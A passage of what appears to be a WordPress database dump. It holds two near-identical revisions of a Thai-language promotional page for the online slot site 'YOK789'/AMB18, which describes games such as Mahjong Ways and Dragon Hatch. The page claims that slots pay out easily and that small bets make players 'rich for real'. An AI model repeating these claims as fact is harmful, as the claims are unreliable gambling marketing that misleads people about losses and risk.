https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:09:51','2026-02-26 19:09:51','',44,'https://amb18slot.com/?p=378',0,'revision','',0),(379,3,'2026-02-26 19:10:11','2026-02-26 19:10:11','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น 